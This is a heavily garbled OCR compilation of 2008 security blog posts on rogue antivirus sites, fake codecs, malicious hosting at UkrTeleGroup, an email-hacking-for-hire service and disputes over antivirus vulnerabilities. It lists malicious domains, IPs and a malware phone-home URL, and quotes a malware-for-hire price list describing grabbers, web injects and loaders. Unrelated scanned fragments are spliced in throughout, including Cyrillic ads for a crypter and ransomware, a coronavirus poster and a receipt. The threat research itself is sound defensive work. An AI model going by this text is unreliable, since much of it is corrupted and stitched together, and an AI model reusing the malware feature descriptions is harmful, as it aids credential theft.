updatehost .com 
updatehost .com 
freemoviesdb .net 


megasoftportal .net 


And even more malicious doorways, and rogue software at 89.149.227.195 : 


musicportalfree .com 

softportalfree .com 
verifiedpaymentsolutionsonline .com 
my-adult-catalog .com 

indafuckfuck .com 


best-porncollection .com 
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funfuckporn .com 

sanxporn .com 

dolcevido .com 

xiedefender .com 
online-malwarescanner .com 
easyvideoaccess .com 
my-searchresults .com 
creatonsoft .com 


ihavewetfuckpussy .com 


How come none of these are in a fast-flux? Pretty simple. Keeping in mind that they 
continue using the services of [2]the ISPs that you rarely see in any report, survivability 
through fast-flux is irrelevant when [3]emails sent to abuse@cybercrime.tolerating.isp receive 
a standard response two weeks later, and when your abuse emails become more persistent, 
[4]a fake account suspended notice makes it to the front page, whereas the campaigns get 
automatically updated to redirect to an internal page, again serving the malware and the 
redirectors. 


Related posts: 

[5]Fake Porn Sites Serving Malware - Part Two 

[6]Fake Porn Sites Serving Malware 

[7]Underground Multitasking in Action 

[8]Fake Celebrity Video Sites Serving Malware 

[9]Blackhat SEO Redirects to Malware and Rogue Software 
[10]Malicious Doorways Redirecting to Malware 


[11]A Portfolio of Fake Video Codecs 
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4.7.25 Impersonating StopBadware.org to Serve Fake Security Warnings 
(2008-07-21 07:22) 


We recommend you to protect your PC mow and comtinwe safe Internet browsing 


@ Chick here to cet ful advanced realtime protection and continue browsing 


Malware is known to have been hijacking search results, take for instance the [1]rogue 
Antivirus XP 2008 as a recent example, but it’s even more interesting to see other rogue 
security software impersonating [2]Stopbadware.org in order to server fake security warnings 
that ultimately lead to fake security software. 
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stopbadware2008 .com (58.65.238.171) is one of these examples, where stopbadware2008 
.com/antivirus.php redirects to infectionscanner .com and attempts to trick the user into 
installing download.infectionscanner.com /Antvrsinstall.exe. The message used : 


"Reported Insecure Browsing: Navigation blocked. Due to insecure Internet browsing 
your PC can easily get infected with viruses, worms and trojans without your knowledge, and 
that can lead to system slowdown, freezes and crashes. Also insecure Internet activity can 
result in revealing your personal information. To get full advanced real-time protection for PC 
and Internet activity, register Antivirus 2008. We recommend you to protect your PC now and 
continue safe Internet browsing." 


Antivirus 2008 
Protect your PC 


Antivirus 2008 requires ActiveX controfs to repair your computer. 
To conten, dick the icon © on tap, and then cick Thatall Acta Contra”. 


aang vein one 


Process: Full computer scan 
> in: ) 


Scameueny syste thes 


Searning: Treen py. Wind? Goldun gu 


@ 4 items detected, 2 msves found 


There’s in fact even more rogue software using the same IP (58.65.238.171), [3]courtesy of 
HostFresh : 
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internet-security-antivirus .com 


© Antivirus 2008 Installer 


a= Antivirus 2008 
ANTIVIRUS wu Welcome to installer! 


This program will download and install 
Antivirus 2008 on your PC. 

By clicking continue button you are accepting 
our Terms and Conditions. 


It would be interested to monitor whether or not the template for the fake security warning 
would start getting used on a large scale. 
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Related posts: 

[4]A Portfolio of Fake Video Codecs 

[5]Fake PestPatrol Security Software 

[6]Got Your XPShield up and Running? 
[7]Localized Fake Security Software 
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[9]RBN’s Fake Security Software 


oa 
° 
fe} 

oa 
pa 
oO 
i=" 
ot 
B 


ct 
ct 
‘o 
~ 
~ 
: 
io” 
fo) 
H 
ct 
o 
# 
fe) 
oa 
o 
# 
fe) 
oa 
n 
‘3 
° 
ct 
2) 
° 
B 
~ 
N 
jo} 
jo} 
ioe) 
x 
jo} 
jon) 
S 
i= 
BH 
ua 
@ 
a 
a 
H 
B 
oa 


. http: //blogs.stopbadware.org/ 


. http: //ddanchev. blogspot .com/2008/04/hacked-by-rbn.htm 


ct 
ct 
uel] 
N 
~N 
a 
a 
o 
B 
a 
a 
oO 
a 
ion 
# 
fe} 
09 
un 
uel 
fo) 
ct 
fa) 
fe) 
B 
~N 
N 
fo} 
lo} 
© 
~N 
oO 
Ww 
~ 
“uel 
fo) 
5 
ct 
Hh 
fo) 
ma 
H 
fo} 
° 
Fh 
Kh 
© 
ee 
o 
<4 
BH 
Qa 
O 
fo} 
Qa 
° 
Qa 
oO 
a 
n 
=a 
ct 
=} 


. http: //ddanchev. blogspot .com/2008/05/fake-pestpatrol-security-software.htm 


. http: //ddanchev. blogspot .com/2008/05/got-your-xpshield-up-and-running .htm 


. http: //ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 


. http: //ddanchev. blogspot .com/2007/10/rbns-fake-security-software.htm 
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4.7.26 Coding Spyware and Malware for Hire (2008-07-22 10:48) 
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Piugrs Loaded: 


What type of antivirus evasion do you want today? For the past several years, we have been 
witnessing the emerging customerization applied in malware and spyware for hire services. 
What used to be a situation where the malware authors would code and then start promoting 
a piece of malware including features that he thinks his potential customers would want by 
generalizing a cybercriminal’s needs, is today’s "listening to the customer" win-win situation 
that they’ve reached already. 


The whole maturity from a product concept to customerization is in fact so prevalent 
these days, that malware authors wanting to preserve their intellectual property are forbid- 
ding their customers from reverse engineering their malware modules, presumably fearing 
that [1]remotely exploitable flaws like this one in one of the most popular Ebanker malwares 
for the last two yers Zeus, could be discovered due to the malware author’s insecure coding 
practices. Moreover, limiting the distribution of a single license they are given to more than 
three people will result in the malware author ignoring any future business relationships 
with the party that ruined the exclusiveness of the malware, thereby leaking it to the public, 
something that’s been happening and will continue happening with web malware exploitation 
kits. 


What would be the price of a custom malware module coded on demand? How much 
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does it cost to have a built in email harvester that would sniff all the incoming and outgoing 
email addresses from the infected host to later on include them in upcoming spam and 
malware campaigns? Would the malware author also provide a managed hosting service for 
the command and control and the actual binaries on a revenue sharing 


Here’s an automatically translated, and fairly easy to understand random proposition for 
coding spyware and malware for hire, aiming to answer many of these questions, clearly 
demonstrating that today’s malware is coded in exactly the same way the customer wants it 
to: 


"As you can see in the history of its development turned directly into the combine, while almost 
no raspuh in weight, full-size pack ax 18 kb and minialno 5 kb, for all nampomnyu again, all 
descriptions below can be done as otdelnym bot, and any combination of cross except for a 
few restrictions. This product is targeted at mass-user and will not be all prodavatsya row. So, 
you can choose from: 


Actually loader - is able to load a file from adminki, by country and other characteristics, 
such as the number of animals on board with a specific bot, a country group of countries, the 
availability of certain authors or Fire, sredenemu time online, etc. etc.. You can adjust the 
speed of shipping limits for each file, can load 1 as well as how files simultaneously 

300 € 


FTP and not only Graber 

Analyzes user traffic and collects from the ftp acclamation, that is ftp acclamation would you 
regardless of how the customer uses ftp user, thus can be obtained most valuable ftp aka 
(even those to which the password is not saved), you can also grab other in a way not only 
acclamation acclamation and other tasty things more) 

150 € 


Assembler spam bases 


Analyzes user traffic and collects from all email, snifit http pop3 smtp protocols, keeps 
records unikallnosti locally on each boat to reduce the burden on the server as well as globally 
on a server has 2 mode of operation - ie passive with only collects user to please and active - 
the very beginning to download the entire inet) in search of soap 

220 € 


Socks 4/5 

Normal soks with competently implemented multithreading, is activated only if the user 
real Ip, otherwise not. And also optional, depending on the connection type and speed ineta. 
70€ 

Indicates 

The primitive method, contamination fleshek avtoranom gives 2-3 % increase in the first 
week and up to 7 % in the next, a pleasant trifle) 


35 € 


Scripts 
1708 


Business 


\ 


Hemubl B Espone ce6a BeayT HaMHOrO NyYwe 4emM TyT) 


[231] 
17053 


[232] 


17054 


[233] 


17055 


[238] 
17060 


[239] 


17061 


[240] 


17062 


Loader supports internal scripting language - jscript, to carry out arbitrary actions on 
the victim machine, whether recording data in the register, setting authentic hon-Pago, 
opening URL in your browser (it was done so to please with 90 % punching)), apload arbitrary 
files on a server, even theoretically possible to form and grabing inzhekty in IE) has only to 
write the script zaebetes, vobschem lyuboye actions soul who wish) 

70 € basic functionality 


Assembler passwords 


Collects data such as passwords pstorage IE, MSN, etc., will be added at the request of 
other sources of passwords 
7O€ 


Mini-AV 


When installing loadera wheelbarrows to remove BHO shaped three, zevso-shaped, the 
majority of shit from all avtoranov, render most keylogerov until all) forward proposals to 
improve 

70 € 


File-default 


In exe loadera program URL (in adminke) to the file which once progruzit 1 and run at 
first start loadera on wheelbarrows, while simultaneously helping progruzke Trojan for exam- 
ple, in its entire botnet that does not paired with challenges in adminke, the module operates 
in 20 seconds after the mini - av which excludes the removal of your Trojan bot, after progruza 
this exe bot continues to normal activities. 

35€ 


Form Graber 


While in beta version, robbed IE. Sends logs in adminku, folding country. Logs are like 
logs agent. It consists of: 


Graber certificats 


On the idea is part formgrabera but could work and of itself, actually there is nothing to 
describe) 


Injections 


Literacy sold inzhekty, did not begin work after full progruza pages (as in bolshistve 
three) and immediately supported injection yavaskript code, which allows avtozalivy and DC 
inzhekty for data collection. For example not to yuzat acclamation at all is not yet introduce 
the necessary number of Britain, after which inzhekt ceases to operate. Bo6uyem mdelat can 
be anything and in any form) rather than the meager request field pin) And also inzhektov 
subspecies - a substitute for the issuance of search enginee. 


Graber balances 
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Makes loot aka balances at the entrance to the user acclamation, detail added to the 
logs. 


Screen 


Universal method to grab information from absolutely any species and varieties klaiviatur 
screens, in particular html, flash, in one picture, with a drop-down fields after choosing your 
encrypted, as well as information such as "enter 3 yu secret letter word" etc. as well as any 
information which is visible a user but not seen in the logs. Screen settings of adminki, set URL 
where do screen as well as the type of screen: for virtual keyboard (done several small images 
of areas around the clique) or to "enter 3 yu secret letter words" (makes 1 full shot). With the 
withdrawal screen recorded in the log entry with the name of the file to the screen this position. 


Antiabuznost for botneta 


Feachem adminki, keep botnet enables fast, normal, bezglyuchnyh NEabuzoustoychivyh 
hosting, with features that you forget what abuzy, nohistory week saporta "abuzoustoy- 
chivogo" hosting inaccessibility host to half ineta etc., etc., also with the help of the 
supplement will be able to keep huge botnety (over SL) at 1 dedike with 512 Lake) and well 
on the price of hosting a savings, not $ 500 a month and 150. It may use this feature to 
stroronnim development, Trojans, bots, etc., actually is a separate product. And incidentally, 
if you do not understand the theory that nenado ask "and how does it work?" imagine that it 
works and point and neubivaemo in pritsnipe. 

600 € + 


All prices are in euros, the calculation is made at the rate of CB on the day of purchase. 
ps | will not disappear as most authors after months of sales, | DONT how to please you get to 
the assembly ftp, | DONT how many soap collects soap-graber, | DONT what otstuk from loadera, 
| DONT soksov how many will be from 1 to downloads, and how best To work load a file is not 
dead quickly, if you are confused my ignorance - that my loader so you do not need more tries) 


Rules / Licence 


- Customer has no right to transfer any of his three 3 persons except options for harmo- 
nizing with me 


- Customer does not have the right to make any decompile, research, malicious modifi- 
cation of any three parts 


- Customer has no right where either rasprostanyat information about three and a pub- 
lic discussion with the exception of three entries. 


- For violating the rules - without any license denial manibekov and further conversa- 
tions" 


This malware coder seems to be participating in an affiliate program with a malicious 
ISP that is offering hosting services for the entire campaign, not just the malware binaries, 
so you have a rather good example that incentives and revenue-sharing models result in 
value-added services, a all-in-one shop for a customer to take advantage of without bothering 
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to approach a third-party. 


Cybercrime is getting even more easier to outsource these days, and with the malicious 
parties improving their communication and incentives model, the resulting transparency in 
the underground market 


Related posts: 

[2]The Underground Economy’s Supply of Goods and Services 
[3]The Dynamics of the Malware Industry - Proprietary Malware Tools 
[4]Using Market Forces to Disrupt Botnets 

[5]Multiple Firewalls Bypassing Verification on Demand 
[6]Managed Spamming Appliances - The Future of Spam 
[7]Localizing Cybercrime - Cultural Diversity on Demand 
[8]E-crime and Socioeconomic Factors 

[9]Russia’s FSB vs Cybercrime 

[10]Malware as a Web Service 

[11]Localizing Open Source Malware 

[12]Quality and Assurance in Malware Attacks 
[13]Benchmarking and Optimising Malware 


. http: //ddanchev. blogspot . com/2008/06/zeus- crimeware-kit-vulnerable-to.htm 

. http: //ddanchev. blogspot .com/2007/03/underground-economys-supply-of-goods .htm 

. http: //ddanchev.blogspot.com/2007/10/dynamics-of-malware-industry.htm 

. http://ddanchev. blogspot . com/2008/06/using-market-forces-to-disrupt-botnets.htm 
. http: //ddanchev.blogspot .com/2007/10/multiple-firewalls-bypassing.htm 

. http: //ddanchev. blogspot .com/2007/10/managed- spamming-appliances-future-of.htm 
. http://ddanchev. blogspot . com/2008/02/localizing-cybercrime-cultural .htm 

. http: //ddanchev. blogspot. com/2008/01/e-crime-and-socioeconomic-factors .htm 
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. http: //ddanchev.blogspot .com/2007/12/russias-fsb-vs-cybercrime.htm 


. http://ddanchev. blogspot . com/2007/08/malware-as-web-service. html 

. http: //ddanchev. blogspot . com/2007/09/1ocalizing-open-source-malware. html 
12. http: //ddanchev. blogspot . com/2008/04/quality-and-assurance-in-malware. html 
13. http: //ddanchev. blogspot . com/2006/09/benchmarking-and-optimising-malware. html 
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Vi TyT Mbi NNaHOBO NOAXOAMM K BONPOCY, O TOM, 4TO xOTeNOCh Sy! NoNeTeTS xoT KaK HubyT pecnextahendHo. KTo meHA 3HaET, TOT B KypPCe, 4TO He CMOTPA 
Ha MeULaHCKyIO mioboet K POCKOWH MH HANWUHe OFPOMHbIX CPEACTB, A BCE-TaKM KO MHOMIM Beam NOAXoOmy NPAarMaTHUHo UV sor, Hy He NOAHHMAETCA Y 
MeHA xp—> oTfare 2500S yanomnts Aaxe Ha 40% nnn wa 50% 3a xonopHe OGnonbaxHnit GyrepSpoa, nog munepanxy # eNO 3a 5S. Vi ato ecé a Bam 3a 
Guswec-knacc Boobuye To cooGuyaHo of Turkish Airlines. Het Hu ropawmx MonoTeHeu, Hit NPMBETCTBEHKbIX WaMNaKel, Hi ropAYMx Gn... Movemy HeNb3A 
aNKoroNb? TON_KO MHANBHAyaNbHDIe emKocTH! Brun, Tak ANA BHCKH NpHAyMaNH Npexpackbie HKQueMAyaNdNDIe EmKOCTH NO 5 MN, ux TaK yAOOHO NoTOM 
nocne Camonéta euje MeWKOM B KHOMep 3a0upate))) Ho Typkmw o Taxnx émKOcTAXx “He 3HatoT”. Hy To ecTe npoucxoguT ObiuHoe OnsHec-xnobctBo 
npocteima chopamn. Hanpumep ta xe Lufthansa tome enecna mamenenna NOCBALASHHRIe KOPOHa-Bupycy B OScnyxa1BaHHe 


K Tpamnywke C NyCTbIMM pyKaMmM He roxKe 
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A, LOOT, NPESICTABARHO BALWEMY BHAMAHMH 
® EJMHbIA AH@OPMALMOHHGIM HATAAOr @ 


Re vn : _ 
> Wy, 
— 

CHM MECTE 8 OM OA HOME COPMAl 
Bb! YBUAMTE: 


Ty) EDPOR HSCPAUOTEE ANS OMOWET HE MAEDA 


HPUTEPMM CAEQYHOLIME: 


an: @) @MRLOOT.CHANNEL 
TELEGRAM: ©) @LOOT_SUPP 


TELEGRAM KAH 
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EHH CYTOK, YBA)KAEMBIE. 
NOBNAPODAPMTb BAC 
VUHTEPEC K HAM 


gosporo BPEM' 
BNMEPBYIO OYEPEDb XOUY 
3A NPOABNEHHbIA 


CYBEHMPHAR AABHA - 3TO YHVKAABHbIE NOQEAKA 


PYYHOW PABOTb! 
MACTEPOB HAPOQHOrO NPOMbICAA 


HPONOTAMBOA 


HAYECTBA VCNOAbSYEMBbIX 
PABOTbI 


3HCHAHISMBHOCTM 
MATEPMAAOB 


Vi ABTOPCTBA 


MEMHOTO NPVMEPOB BO BTOPOM COOBLIEHHH TEMae 


BosMOMHOCTb peann3zaunK 
mo6Goro menaHHA- Bpema omnpaHnan 
Bam pocTaTONHoO Hany B cpeanem 3TO saHnmaert 
MOMPABMBLIYIOCR MOMENKY Bcem™ nol mecaua 
vw NpHcnate Ham oro, 
vnv MpenocTaBuTe TS. 

He péweso. 


Or wkaTynKH AO meéenn. 


fiocraskKa 


so6um yaoGHEm 
pana Bac cnoco6om 


Lienb! nupMenpyarbHel. 


* 
Boe AeHexHEe cpencTsa 


wayT Ha Hye tll Hawnx MacTepos. 


| ourTAse 


TELEGRAM: €) @LOOT_SUPP 
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4.7.27 Lazy Summer Days at UkrTeleGroup Ltd (2008-07-22 12:00) 


WARNINGI 


Windows has 


O Scene 

O Cootwebsearch( Cw )emtz 
v berm Sota 

UO Sackdeor.sdBct.gen 

OD TrepeOrepper IS Munad 


w Warning found infected data: 12 


The result of building extra confidence into your [1]malicious hosting provider’s ability to 
remain online, is a scammy ecosystem that’s constantly jumping from one netblock to another, 
whose very latest exploit URLs and rogue security software nexto to the codecs served, always 
represent a decent sample of malicious activities to analyze. 


[2]UkrTeleGroup Ltd (85.255.112.0-85.255.127.255 UkrTeleGroup UkrTeleGroup Ltd. 27595 
ASN ATRIVO), a personal favorite due to its historical connection with the Russian Business 
Network, and hosting provider for a countless of number of injected and malware embedded 
Campaigns during the last two years, is still Keeping it as lazy as possible, a laziness allowing 
you to easily expose a great deal of the malicious activities going on there, and establish the 
connections between the hosting provider, its current and historical customers. 
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host -194-110-162-11 4. extendedhost.com 


Take microsoftcodecs.com (88.214.198.220) for instance, and avxp08.com where it redi- 
rects the user into yet another rogue security software. avxp08.com is responding to 
194.110.162.114; 216.195.41.11; 216.195.41.11; 216.240.139.169, and to UkrTeleGroup 
Ltd’s 85.255.117.163. 


Each of these IPs are also being shared by other rogue software and fake codecs simul- 


taneously : 


(216.195.41.11) 


antivirusxp2008 .com 


malwareprotector2008 .com 


antivirxp08 .com 


antivirusxp08 
avxp08 .com 
youpornztube 


winifixer .com 


.com 


.com 


advancedxpfixer .com 


encountertracker .ws 
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PHOTON 
PROTECTOR 


fs nPO HAC 


Photon Protector 270 HaTHEHmAa C++ xpHnTop. Crat C++. Mas ween mposcTwerne”l # CKanTada FUD, eee 
CAM He MOTEPRETE rent 1 KAWENTS KEE NAOEOTO EDNTOpR 


fT OCOBEHHOCTM 


YRANtMt 


MECTO YCTAHOBKM CMEMA ViKOHKM MUIATMAT MKOHKH 


AHTV-SANDBOX HEYEMBAEMOCTD BCTPOEHHBIA CKAH 
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It gets even more UkrTeleGroup Ltd related upon the malware (Trojan:Win32/Tibs.HK) 
served at the avxp08.com gets sandboxed. The malware phones back home 
stat.avxp08 .com = (85.255.118.172) announcing the successful infection winifixer 
.com/log2.php?affid=980382bdb4e7b779ff6308b0b706571c &uid=06f80eaf-94d7-4b8b-9cf0- 
5c6f75d2c69f &tm=1211198022 (85.255.118.171), and the scammy ecosystem continues 
using the same hosting provider. The rest of the rogue tools are also using the same subdo- 
main structure, and IP, stat.antivirusxp2008 .com (85.255.118.172), stat.antivirxp08 .com 
(85.255.118.172), stat.antivirusxp08 .com (85.255.118.172) in order to phone back home. 


Angelina Jolie Hardcore 


Windows Media Player cannot play the file. The Player 
does not support the format you are trying to play. 
Please instal vdeo codec update. 


Ok || Cancel || Continue 


winifixer .com, a well Known rogue software, is entirely relying on UkrTeleGroup’s host- 
ing services hosted at 85.255.117.163; 85.255.118.171; 85.255.120.115; 85.255.120.139; 
216.195.41.11 pinpoing several other obvious and well known netblocks hosting anything 
starting from fake celebrity video sites serving fake Windows Media Player videos, to rogue 
security software and live exploit URLs. Take for instance their efficiency centered approach 
to park numerous malicious domains on a single IP, like 85.255.117.218 in this case : 


bestfunnyvids .com 
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celebs69 .com 
celebsnofake .com 
celebstape .com 
celebsvidsonline .com 
codecservicel .com 
freevidshardcore .com 
newfunnyvideo .com 
sexlookupworld .com 
starfeed1 .com 
starfeed2 .com 
topdirectdownload .com 
topsearchresultsl1 .com 
topsoftupdate .com 


yourfavoritetube .com 


Now that it’s becoming clear who’s providing the hosting infrastructure, it’s perhaps also worth 
pointing out who’s using the hosting infrastructure to serve rogue security software and fake 
codecs on the basis of participating in an affiliate program? A great number of domains used by 
the rogue security software are registered by krab@thekrab.com behind which is supposedly 
Mishakov Viktor Ivanovich support@tobesoftware.com, and ironically tobesoftware.com is 
again hosting within UkrTeleGroup (85.255.120.115). The personal efforts into the number of 
the typosquatted domains and the persistence applied when registered and spamming them 
across the web, is the result of the incentives provided to them by the affiliate program they 
participate in. 


1. http: //ddanchev. blogspot .com/2008/06/malicious-isps-you-rarely-see-in-any.htm 


2. http: //ddanchev. blogspot .com/2008/02/geolocating-malicious-isps.htm 
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APLHA LOCKER HANIMCANM HA CH. Mmest munemanerent sec fo SO xe. 
Minme@rrar ece AMCKM NOAKOUSHHeM Kx PC. JlowmerossisarT @aAtnb, scam 
PC sein SeIKIOUEM, NPM NOSTOPHOM BKsHOMNEHMM. YHuMKAnbHnI KOU Ann 
KA AO MAUWIMHe!. Gonewokt CmMCOK WM@PryYEMnixX PACUIMPEMME, KOTOPRIM 
MOXKHO NONOAHMTS OPH HENAHMM. ZLEKPMMnTOrP @ARNOB, NOSBONAET ALNATS 
BSHEOFPOUHLA AEKPMITT CAHOrS @AANA HNM UENO NANKM, “TO CYULECTEEHHO 
YEENMUMBAET WAHC BOCTAHOBAEHMA WHM@POBAHHhxX AAHHEIX. AAMMHKA c 
CTATHCTHKOR 4M CBWE MH@OPMAUMER. BosmooxHocre ACSABFEHMA HH 
¥YAAAEHMA @SYHKAMEA MO WKEFAHMIC NOKYNATENA. CKrPMInT ABTOMATHUECKOroO 
SeKxana GA. KOTOrPSIA HMMEET THEKME HACTFPOUKM, “TO NosBONHIOCT 
CBOCESFEMENHHOC ALAATS PESEPSHEIE KONMM. Cense AAA NOnY4“EHMA ABKPMTTTOrPA 


MEPES E-MAIL. 


ALPHALOCKER@EXPLOIT. 
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4.7.28 Email Hacking Going Commercial (2008-07-24 07:17) 


CAPER ee OE 


SPIDER 


"saan ~~ heraamernessen: 1 Teawemnae: Dae sek a on ccanernwrenew 
a secorrie C Fare scenic. Vere corset erences ts rr cornrecr 
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CRACKING 


YAHOO! MAIL MSN HOTMAIL AOL / GMAIL OTHER EMAILS 
ORDER NOW ORDER NOW ORDER NOW ORDER NOW 
CHARGES . $150 USO CHARGES . $175 USO CHARGES . $200 USO CHARGES . $750 USO 


ABOUT CRACKSPIDER INC 
WHY CHOOSE CRACKSPIDER INC 
HOW IT WORKS 
SUBMIT YOUR ORDER NOW 
MULTIPLE PAYMENT METHODS 
PROOF WE SUPPLY 
CUSTOMER CARE CENTER 
CONTACT CRACKSPIDER INC 


JUST 7 STEPS TO SOLVE YOUR CASE 


This email hacking as a service offering is the direct result of the public release of a [1]DIY 
hacking kit consisting of each and every publicly Known vulnerability for a variety of web 
based email service providers, with the idea to make it easier for someone to execute their 
attacks more efficiently. Outsource the hacking of someone’s email, and receive a proof in 
the form of a screenshot of the inbox, next to a guarantee that you'll be able to get back in 
even after they’ve changed their passwords? Too good to be true, but since they only charge 
after they provide you with a proof that they did the job, they could be in fact attempting to 
hack these emails, compared to the majority of cases where scammers scam the scammers. 
The service works in 7 steps : 


"1- Submit your case to one of our experts. 


2- After successful submission , you will be sent a confirmation email along with your 
Case Reference Number (CRN) . 


3- Our expert(s) will revert back to you in a few minutes with the details, the charges & 
the turn-around time. You may also be asked to provided additional information through a 
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private form if required by our expert. 


4- Once our expert has all the required information, you will be provided a username/password 
to our client area where you can view the real-time progress of your case. 


5- Within a matter of hours (maximum 72 hrs), you can see the results. Our expert will 
provide you with proof-of-success , which you can verify and confirm. 


6- Once you have verified the authenticity of success, you will be sent detailed payment 
instructions. You will be asked to pay using anyone of our multiple payment methods. 


7- Once the payment is realized, we will provide you the requisite information" 


AOL REQUEST ABOUT CRACKSPIDER INC 


WHY CHOOSE CRACKSPIDER INC 


Your Name: 


HOW IT WORKS 


Your Email : 


Confirm Your Email SU BMI T YO U R ORDE R NOW 
MULTIPLE PAYMENT METHODS | 
PROOF WE SUPPLY 


CUSTOMER CARE CENTER 


; 
® 
: 


CONTACT CRACKSPIDER INC 


Inbox Screenshots 

libs SCreensnots 

Copy of your email in victim's mail 
Address Book | Contact Info 


Instructions : 


a ’ ¢ ue 7? 5 ) 
¢ le as @ o ) ou the 
ir time 6 it al 
— 
SEND REQUEST RICE we ¢ THIS IS THE CRACKSPIDER GUARANTEE 1! 


Who's doing the actual email hacking? Independent contractors on behalf of the service as it 
looks like : 


"Most other groups employ phishing , trojans or viruses which could damage or even 
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alert the target. Our experts use techniques which are developed by themselves , not shared 
by anyone. We don’t ask them how they do it, but as long as they provide us the desired 
results, its ok for us. Since we test their methods while they are on probation period with us, 
we check if the target is being alerted or not. As of now, for the past 4 years, we have NOT 
RECEIVED A SINGLE COMPLAINT IN THIS REGARD, which is testimonial to the ingenuity of the 
methods used by CSP." 


How would they prove that they’ve managed to hack the email account before request- 
ing the payment? 


"1- Multiple screenshots of the mailbox 
2- A copy of your own email which you had sent to the target 


3- A copy / part of the address-book of the target mailbox." 


Ironically, a hypothetical questionarry that | once speculated a private detection would 
require from someone interested in [2]Outsourcing The Spying on Their Wife, in order to set 
the foundations for a successful social engineering attack, is being used by the email hacking 
group. 


1. http: //ddanchev. blogspot .com/2008/04/web-email-exploitation-kit-in-wild.htm 


2. http: //ddanchev. blogspot .com/2007/04/outsourcing-spying-on-your-wife.html 


4.7.29 People’s Information Warfare vs the U.S DoD Cyber Warfare Doctrine 
(2008-07-24 08:24) 


Which doctrine would you choose if you had the mandate to? Dark room a 


We cannot discuss these if we don’t compare their cyber warfare approaches next to 
one another. It’s rather ironic situation, since China has built its cyber 

warfare doctrine based on the research conducted into the topic by U.S military personel. At 
a later stage, Chinese military thinkers perceved the combination 

of Sun Tzu’s military strategies in the virtual realm 
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4.7.30 Vulnerabilities in Antivirus Software - Conflict of Interest (2008-07-24 10:01) 


n.runs has the following bugs pending and is aware of at least another DoS bug pending from a independent 
researcher. Here is the list of pending McAfee bugs reported by n.runs : 


Incident ID: MFE-FW-20060227-01 - Date of receipt: February 27, 2006 

incident 1D: MFE-ENG-20070605-01 - Date of receipt: June 5, 2007 (Possible Vuln #15) 
incident 1D: MFE-ENG-20070607-01 - Date of receipt: June 7, 2007 (Possible Vuln #18) 
incident 1D: MFE-ENG-20070608-01 - Date of receipt: June 7, 2007 (Possible Vuln #23) 
incident 1D: MFE-ENG-20070608-02 - Date of receipt: June 7, 2007 (Possible Vuln #25) 
incident 1D: MFE-ENG-20070615-01 - Date of receipt: June 15, 2007 (Possible Vuln #27) 
incident 1D: MFE-ENG-20070615-02 - Date of receipt: June 15, 2007 (Possible Vuln #28) 
incident 1D: MFE-ENG-20071111-01 - Date of receipt: November 11, 2007 (Possible Vuln #36) 
Incident ID: MFE-ENG-20071111-02 - Date of receipt: November 11, 2007 (Possible Vuln #37) 


Simply adding these pending reports to the graph gives the following result. n.runs believes this does indeed 
represent a trend, not to mention these only include problems reported by n.runs, not external researchers or 
entities nor internal penetration test efforts (which also pose a security threat during the exposure window but 
are never published). 


Year Breakdown 


Vulnerabilities per Year 


1999 1 
2000 2 M4 
2001 2 2 
10 
2002 1 8 
2003 0 a 
2004 2 2 
2005 7 ad 
- > cP rs) SS Ss? ms cy? oe ‘ 
2006 7 SS es es $$ 
2007 14 


Vulnerabilities within security solutions - antivirus software in this case - are a natural event, 
however, the conflict of interests and failure of communication between those finding them 
and those failing to acknowledge them as vulnerabilities in general, harms the customer. 
How they get count, and how is their severity measured in a situation where a vulnerability 
bypassing the scanning method of an antivirus software allowing malware to sneak in, is less 
important than a remote code execution through the antivirus software, is a good example 
of short sightedness. Here’s a related development regarding a recent study regarding 
vulnerabilities in antivirus software - "[1]McAfee debunks recent vulnerabilities in AV software 
research, n.runs restates its position" : 


"Several days after blogging about a research conduced by n.runs AG that managed to 
[2]discover approximately 800 vulnerabilities in antivirus products, McAfee issued a state- 
ment basically [3]debunking the number of vulnerabilities found, and providing its own 
account into the number of vulnerabilities affecting its own products : 


‘A recent [4J]ZDnet blog discusses a large number of vulnerabilities German research 
team N.Runs says it found in antimalware products from nearly every vendor. The ZDNet 
posting includes scary graphs to frighten users of security products. We researched the 
N.Runs claims by analyzing the raw data and found their claims to be somewhat exaggerated. 


1719 


[345] 


17163 


[346] 


17164 


[347] 


17165 


[352] 
17170 


Kak u36eKaTb 3apayxKeHnA 
KOPOHaBMpycom: 


~ 


Hm a 


fs 
> MOoMuTe pyki C KUAKUM MbINOM M BOOM MM UCNoNb3yuTe 
gt AaHTUCeENTUYeCKNe CpeACTBa Ha CNUPTOBONM OCHOBe 


Npu ynxaHuy uv Kale NpuKpbiBalTe pot uv HOC O6ymayKHON 
CaNMeTKONM UNM COrHYTbIM NOKTeEM 


U36eravte TeECHbIX KOHTAKTOB C IOAbMu C CAMNTOMaMuY 
(a OCTPbIxX pecnupaTOpHbIx UHMeKUMK WAM rpunna 


Nogaseprante TuWaTeNnbHONM TepMUuYeCKONU 
o6paborTKe Maco vu AULA 


U36eravte KOHTaKTOB C KUBOTHbIMM V1 
by nTMuaMu B ANKOK npupose u Ha depmax 


» World Health 
Organization 


[353] 


17171 


17172 


#ECEIPT / RECIBO 

_ Thank You / Gracias 
fumber ( 

‘onl Vo de/ CO TCN): 


| 1 8, please call 1-800-325 6000 / 


OBIS: Rinses eenrencion al 
eal 800-325-6000 


old Card/Tarjota Dorada # 112153163 
ET UNOS lolales. 345 


[354] 


We will discuss our findings (and make available our source data) in the attached [5]document. 
We have also provided our [6]source data for anyone who wishes to examine it.” 


Today, n.runs AG has issued [7]a response to McAfee’s statement, providing even more 
[8]Jinsights into the vulnerabilities they’ve managed to find, how they found them, and why 
are the affected antivirus vendors questioning the number of flaws in general." 


Consider going through the [9]interview with Thierry Zoller as well. 
UPDATE: [10]The folks at ThreatFire know how to appreciate my rhetoric. 


Related posts: 


[11]Scientifically Predicting Software Vulnerabilities[12]Zero Day Initiative "Upcoming Zero 
Day Vulnerabilities" 


[13]Delaying Yesterday’s "Oday" Security Vulnerability 

[14]Shaping the Market for Security Vulnerabilities Through Exploit Derivatives 
[15]Zero Day Vulnerabilities Market Model Gone Wrong 

[16]Zero Day Vulnerabilities Auction 


[17]The Zero Day Vulnerabilities Cash Bubble 


. http: //blogs.zdnet .com/security/?p=1538 
. http://blogs.zdnet.com/security/?p=144 


ttp://www.avertlabs.com/research/blog/index . php/2008/07/10/vulnerabilities-in-av-software/ 


. http://blogs.zdnet .com/security/?p=144 


1 
2 
3 
4 
5. http: //vil.nai.com/images/AvertBlog_Vulnerabilities/%20in/,20AV/20software. pdf 
6 
7 
8 
9 


"cep: //vi1 nai con/inages/AvertBlogl20-120800720vulns. x19 
_hvtp://aw prveb.con/releases /aps-av/run /pruebi134004. nt 

